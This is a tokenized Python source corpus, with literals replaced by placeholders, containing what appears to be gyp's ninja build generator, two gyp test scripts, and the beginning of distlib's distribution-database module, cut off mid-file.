'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> return max ( <NUM_LIT:1> , avail_bytes / ( <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) ) <EOL> except : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:1> <EOL> def _GetWinLinkRuleNameSuffix ( embed_manifest ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if embed_manifest else '<STR_LIT>' <EOL> def _AddWinLinkRules ( master_ninja , embed_manifest ) : <EOL> """<STR_LIT>""" <EOL> def FullLinkCommand ( ldcmd , out , binary_type ) : <EOL> resource_name = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> } [ binary_type ] <EOL> return '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % { <EOL> '<STR_LIT>' : sys . executable , <EOL> '<STR_LIT>' : out , <EOL> '<STR_LIT>' : ldcmd , <EOL> '<STR_LIT>' : resource_name , <EOL> '<STR_LIT>' : embed_manifest } <EOL> rule_name_suffix = _GetWinLinkRuleNameSuffix ( embed_manifest ) <EOL> use_separate_mspdbsrv = ( <EOL> int ( os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) ) != <NUM_LIT:0> ) <EOL> dlldesc = '<STR_LIT>' % rule_name_suffix . upper ( ) <EOL> dllcmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( sys . executable , use_separate_mspdbsrv ) ) <EOL> dllcmd = FullLinkCommand ( dllcmd , '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = dlldesc , command = dllcmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> restat = True , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = dlldesc , command = dllcmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> restat = True , <EOL> pool = '<STR_LIT>' ) <EOL> exe_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( sys . executable , use_separate_mspdbsrv ) ) <EOL> exe_cmd = FullLinkCommand ( exe_cmd , '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = '<STR_LIT>' % rule_name_suffix . upper ( ) , <EOL> command = exe_cmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> def GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> config_name ) : <EOL> options = params [ '<STR_LIT>' ] <EOL> flavor = gyp . common . GetFlavor ( params ) <EOL> generator_flags = params . get ( '<STR_LIT>' , { } ) <EOL> build_dir = os . path . normpath ( <EOL> os . path . join ( ComputeOutputDir ( params ) , config_name ) ) <EOL> toplevel_build = os . path . join ( options . toplevel_dir , build_dir ) <EOL> master_ninja_file = OpenOutput ( os . path . join ( toplevel_build , '<STR_LIT>' ) ) <EOL> master_ninja = ninja_syntax . Writer ( master_ninja_file , width = <NUM_LIT> ) <EOL> gyp . common . CopyTool ( flavor , toplevel_build ) <EOL> if flavor == '<STR_LIT>' : <EOL> ar = '<STR_LIT>' <EOL> cc = '<STR_LIT>' <EOL> cxx = '<STR_LIT>' <EOL> ld = '<STR_LIT>' <EOL> ld_host = '<STR_LIT>' <EOL> else : <EOL> ar = '<STR_LIT>' <EOL> cc = '<STR_LIT>' <EOL> cxx = '<STR_LIT>' <EOL> ld = '<STR_LIT>' <EOL> ldxx = '<STR_LIT>' <EOL> ld_host = '<STR_LIT>' <EOL> ldxx_host = '<STR_LIT>' <EOL> ar_host = '<STR_LIT>' <EOL> cc_host = None <EOL> cxx_host = None <EOL> cc_host_global_setting = None <EOL> cxx_host_global_setting = None <EOL> clang_cl = None <EOL> nm = '<STR_LIT>' <EOL> nm_host = '<STR_LIT>' <EOL> readelf = '<STR_LIT>' <EOL> readelf_host = '<STR_LIT>' <EOL> build_file , _ , _ = gyp . common . ParseQualifiedTarget ( target_list [ <NUM_LIT:0> ] ) <EOL> make_global_settings = data [ build_file ] . get ( '<STR_LIT>' , [ ] ) <EOL> build_to_root = gyp . common . InvertRelativePath ( build_dir , <EOL> options . toplevel_dir ) <EOL> wrappers = { } <EOL> for key , value in make_global_settings : <EOL> if key == '<STR_LIT>' : <EOL> ar = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> ar_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> cc = os . path . join ( build_to_root , value ) <EOL> if cc . endswith ( '<STR_LIT>' ) : <EOL> clang_cl = cc <EOL> if key == '<STR_LIT>' : <EOL> cxx = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> cc_host = os . path . join ( build_to_root , value ) <EOL> cc_host_global_setting = value <EOL> if key == '<STR_LIT>' : <EOL> cxx_host = os . path . join ( build_to_root , value ) <EOL> cxx_host_global_setting = value <EOL> if key == '<STR_LIT>' : <EOL> ld = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> ld_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> nm = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> nm_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> readelf = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> readelf_host = os . path . join ( build_to_root , value ) <EOL> if key . endswith ( '<STR_LIT>' ) : <EOL> wrappers [ key [ : - len ( '<STR_LIT>' ) ] ] = os . path . join ( build_to_root , value ) <EOL> for key , value in os . environ . items ( ) : <EOL> if key . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> key_prefix = key [ : - len ( '<STR_LIT>' ) ] <EOL> key_prefix = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , key_prefix ) <EOL> wrappers [ key_prefix ] = os . path . join ( build_to_root , value ) <EOL> if flavor == '<STR_LIT>' : <EOL> configs = [ target_dicts [ qualified_target ] [ '<STR_LIT>' ] [ config_name ] <EOL> for qualified_target in target_list ] <EOL> shared_system_includes = None <EOL> if not generator_flags . get ( '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> shared_system_includes = gyp . msvs_emulation . ExtractSharedMSVSSystemIncludes ( <EOL> configs , generator_flags ) <EOL> cl_paths = gyp . msvs_emulation . GenerateEnvironmentFiles ( <EOL> toplevel_build , generator_flags , shared_system_includes , OpenOutput ) <EOL> for arch , path in cl_paths . items ( ) : <EOL> if clang_cl : <EOL> path = clang_cl <EOL> command = CommandWithWrapper ( '<STR_LIT>' , wrappers , <EOL> QuoteShellArgument ( path , '<STR_LIT>' ) ) <EOL> if clang_cl : <EOL> command += ( '<STR_LIT>' if arch == '<STR_LIT>' else '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' + arch , command ) <EOL> cc = GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , cc ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , cc ) ) <EOL> cxx = GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , cxx ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , cxx ) ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . variable ( '<STR_LIT>' , ld ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , ar ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , ld ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , ldxx ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , ar ) ) <EOL> if flavor != '<STR_LIT>' : <EOL> master_ninja . variable ( <EOL> '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , nm ) ) <EOL> master_ninja . variable ( <EOL> '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , readelf ) ) <EOL> if generator_supports_multiple_toolsets : <EOL> if not cc_host : <EOL> cc_host = cc <EOL> if not cxx_host : <EOL> cxx_host = cxx <EOL> master_ninja . variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' ] , ar_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' ] , nm_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> GetEnvironFallback ( [ '<STR_LIT>' ] , readelf_host ) ) <EOL> cc_host = GetEnvironFallback ( [ '<STR_LIT>' ] , cc_host ) <EOL> cxx_host = GetEnvironFallback ( [ '<STR_LIT>' ] , cxx_host ) <EOL> if '<STR_LIT>' in cc_host and cc_host_global_setting : <EOL> cc_host = cc_host_global_setting . replace ( '<STR_LIT>' , cc ) <EOL> if '<STR_LIT>' in cxx_host and cxx_host_global_setting : <EOL> cxx_host = cxx_host_global_setting . replace ( '<STR_LIT>' , cxx ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> CommandWithWrapper ( '<STR_LIT>' , wrappers , cc_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> CommandWithWrapper ( '<STR_LIT>' , wrappers , cxx_host ) ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . variable ( '<STR_LIT>' , ld_host ) <EOL> else : <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( <EOL> '<STR_LIT>' , wrappers , ld_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( <EOL> '<STR_LIT>' , wrappers , ldxx_host ) ) <EOL> master_ninja . newline ( ) <EOL> master_ninja . pool ( '<STR_LIT>' , depth = GetDefaultConcurrentLinks ( ) ) <EOL> master_ninja . newline ( ) <EOL> deps = '<STR_LIT>' if flavor == '<STR_LIT>' else '<STR_LIT>' <EOL> if flavor != '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> else : <EOL> cc_command = ( '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cxx_command = ( '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = cc_command , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = cxx_command , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sys . executable ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) ) <EOL> if flavor != '<STR_LIT>' and flavor != '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> mtime_preserving_solink_base = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) } ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = <EOL> '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> pool = '<STR_LIT>' ) <EOL> elif flavor == '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' ) <EOL> _AddWinLinkRules ( master_ninja , embed_manifest = True ) <EOL> _AddWinLinkRules ( master_ninja , embed_manifest = False ) <EOL> else : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' } ) ) <EOL> solink_base = '<STR_LIT>' <EOL> mtime_preserving_solink_base = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : solink_base , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> solink_suffix = '<STR_LIT>' <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : solink_suffix , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = solink_base % { '<STR_LIT>' : solink_suffix , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : solink_suffix , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = solink_base % { '<STR_LIT>' : solink_suffix , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' % sys . executable ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' % sys . executable ) <EOL> else : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . newline ( ) <EOL> all_targets = set ( ) <EOL> for build_file in params [ '<STR_LIT>' ] : <EOL> for target in gyp . common . AllTargets ( target_list , <EOL> target_dicts , <EOL> os . path . normpath ( build_file ) ) : <EOL> all_targets . add ( target ) <EOL> all_outputs = set ( ) <EOL> target_outputs = { } <EOL> target_short_names = { } <EOL> empty_target_names = set ( ) <EOL> non_empty_target_names = set ( ) <EOL> for qualified_target in target_list : <EOL> build_file , name , toolset = gyp . common . ParseQualifiedTarget ( qualified_target ) <EOL> this_make_global_settings = data [ build_file ] . get ( '<STR_LIT>' , [ ] ) <EOL> assert make_global_settings == this_make_global_settings , ( <EOL> "<STR_LIT>" % <EOL> ( this_make_global_settings , make_global_settings ) ) <EOL> spec = target_dicts [ qualified_target ] <EOL> if flavor == '<STR_LIT>' : <EOL> gyp . xcode_emulation . MergeGlobalXcodeSettingsToSpec ( data [ build_file ] , spec ) <EOL> build_file = gyp . common . RelativePath ( build_file , options . toplevel_dir ) <EOL> qualified_target_for_hash = gyp . common . QualifiedTarget ( build_file , name , <EOL> toolset ) <EOL> hash_for_rules = hashlib . md5 ( qualified_target_for_hash ) . hexdigest ( ) <EOL> base_path = os . path . dirname ( build_file ) <EOL> obj = '<STR_LIT>' <EOL> if toolset != '<STR_LIT:target>' : <EOL> obj += '<STR_LIT:.>' + toolset <EOL> my_base_path = base_path . split ( os . sep ) <EOL> i = next ( i for i , x in enumerate ( my_base_path ) if x != '<STR_LIT:..>' ) <EOL> my_base_path = ( '<STR_LIT:..>' * i ) + os . sep . join ( my_base_path [ i : ] ) <EOL> output_file = os . path . join ( obj , my_base_path , name + '<STR_LIT>' ) <EOL> ninja_output = StringIO ( ) <EOL> writer = NinjaWriter ( hash_for_rules , target_outputs , base_path , build_dir , <EOL> ninja_output , <EOL> toplevel_build , output_file , <EOL> flavor , toplevel_dir = options . toplevel_dir ) <EOL> target = writer . WriteSpec ( spec , config_name , generator_flags ) <EOL> if ninja_output . tell ( ) > <NUM_LIT:0> : <EOL> with OpenOutput ( os . path . join ( toplevel_build , output_file ) ) as ninja_file : <EOL> ninja_file . write ( ninja_output . getvalue ( ) ) <EOL> ninja_output . close ( ) <EOL> master_ninja . subninja ( output_file ) <EOL> if target : <EOL> if name != target . FinalOutput ( ) and spec [ '<STR_LIT>' ] == '<STR_LIT:target>' : <EOL> target_short_names . setdefault ( name , [ ] ) . append ( target ) <EOL> target_outputs [ qualified_target ] = target <EOL> if qualified_target in all_targets : <EOL> all_outputs . add ( target . FinalOutput ( ) ) <EOL> non_empty_target_names . add ( name ) <EOL> else : <EOL> empty_target_names . add ( name ) <EOL> if target_short_names : <EOL> master_ninja . newline ( ) <EOL> master_ninja . comment ( '<STR_LIT>' ) <EOL> for short_name in target_short_names : <EOL> master_ninja . build ( short_name , '<STR_LIT>' , [ x . FinalOutput ( ) for x in <EOL> target_short_names [ short_name ] ] ) <EOL> empty_target_names = empty_target_names - non_empty_target_names <EOL> if empty_target_names : <EOL> master_ninja . newline ( ) <EOL> master_ninja . comment ( '<STR_LIT>' ) <EOL> for name in sorted ( empty_target_names ) : <EOL> master_ninja . build ( name , '<STR_LIT>' ) <EOL> if all_outputs : <EOL> master_ninja . newline ( ) <EOL> master_ninja . build ( '<STR_LIT:all>' , '<STR_LIT>' , list ( all_outputs ) ) <EOL> master_ninja . default ( generator_flags . get ( '<STR_LIT>' , '<STR_LIT:all>' ) ) <EOL> master_ninja_file . close ( ) <EOL> def PerformBuild ( data , configurations , params ) : <EOL> options = params [ '<STR_LIT>' ] <EOL> for config in configurations : <EOL> builddir = os . path . join ( options . toplevel_dir , ComputeOutputDir ( params ) , <EOL> config ) <EOL> arguments = [ '<STR_LIT>' , '<STR_LIT>' , builddir ] <EOL> print ( '<STR_LIT>' % ( config , arguments ) ) <EOL> subprocess . check_call ( arguments ) <EOL> def CallGenerateOutputForConfig ( arglist ) : <EOL> signal . signal ( signal . SIGINT , signal . SIG_IGN ) <EOL> ( target_list , target_dicts , data , params , config_name ) = arglist <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , config_name ) <EOL> def GenerateOutput ( target_list , target_dicts , data , params ) : <EOL> target_dicts = gyp . xcode_emulation . CloneConfigurationForDeviceAndEmulator ( <EOL> target_dicts ) <EOL> user_config = params . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT>' , None ) <EOL> if gyp . common . GetFlavor ( params ) == '<STR_LIT>' : <EOL> target_list , target_dicts = MSVSUtil . ShardTargets ( target_list , target_dicts ) <EOL> target_list , target_dicts = MSVSUtil . InsertLargePdbShims ( <EOL> target_list , target_dicts , generator_default_variables ) <EOL> if user_config : <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> user_config ) <EOL> else : <EOL> config_names = target_dicts [ target_list [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] . keys ( ) <EOL> if params [ '<STR_LIT>' ] : <EOL> try : <EOL> pool = multiprocessing . Pool ( len ( config_names ) ) <EOL> arglists = [ ] <EOL> for config_name in config_names : <EOL> arglists . append ( <EOL> ( target_list , target_dicts , data , params , config_name ) ) <EOL> pool . map ( CallGenerateOutputForConfig , arglists ) <EOL> except KeyboardInterrupt : <EOL> pool . terminate ( ) <EOL> raise <EOL> else : <EOL> for config_name in config_names : <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> config_name ) </s>
<s> """<STR_LIT>""" <EOL> import TestGyp <EOL> import sys <EOL> if sys . platform == '<STR_LIT>' : <EOL> test = TestGyp . TestGyp ( formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> CHDIR = '<STR_LIT>' <EOL> INFO_PLIST_PATH = '<STR_LIT>' <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , test . ALL , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( INFO_PLIST_PATH , chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( INFO_PLIST_PATH , chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( '<STR_LIT>' , <EOL> chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . pass_test ( ) </s>
<s> """<STR_LIT>""" <EOL> import imp <EOL> import os <EOL> import sys <EOL> import unittest <EOL> import TestGyp <EOL> test = TestGyp . TestGyp ( ) <EOL> sys . path . append ( os . path . join ( test . _cwd , '<STR_LIT>' ) ) <EOL> files_to_test = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> suites = [ ] <EOL> for filename in files_to_test : <EOL> name = os . path . splitext ( os . path . split ( filename ) [ <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> full_filename = os . path . join ( test . _cwd , filename ) <EOL> module = imp . load_source ( name , full_filename ) <EOL> suites . append ( unittest . defaultTestLoader . loadTestsFromModule ( module ) ) <EOL> all_tests = unittest . TestSuite ( suites ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( all_tests ) <EOL> if result . failures or result . errors : <EOL> test . fail_test ( ) <EOL> test . pass_test ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import base64 <EOL> import codecs <EOL> import contextlib <EOL> import hashlib <EOL> import logging <EOL> import os <EOL> import posixpath <EOL> import sys <EOL> import zipimport <EOL> from . import DistlibException , resources <EOL> from . compat import StringIO <EOL> from . version import get_scheme , UnsupportedVersionError <EOL> from . metadata import Metadata , METADATA_FILENAME , WHEEL_METADATA_FILENAME <EOL> from . util import ( parse_requirement , cached_property , parse_name_and_version , <EOL> read_exports , write_exports , CSVReader , CSVWriter ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPORTS_FILENAME = '<STR_LIT>' <EOL> COMMANDS_FILENAME = '<STR_LIT>' <EOL> DIST_FILES = ( '<STR_LIT>' , METADATA_FILENAME , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , EXPORTS_FILENAME , '<STR_LIT>' ) <EOL> DISTINFO_EXT = '<STR_LIT>' <EOL> class _Cache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name = { } <EOL> self . path = { } <EOL> self . generated = False <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name . clear ( ) <EOL> self . path . clear ( ) <EOL> self . generated = False <EOL> def add ( self , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist . path not in self . path : <EOL> self . path [ dist . path ] = dist <EOL> self . name . setdefault ( dist . key , [ ] ) . append ( dist ) <EOL> class DistributionPath ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path = None , include_egg = False ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = sys . path <EOL> self . path = path <EOL> self . _include_dist 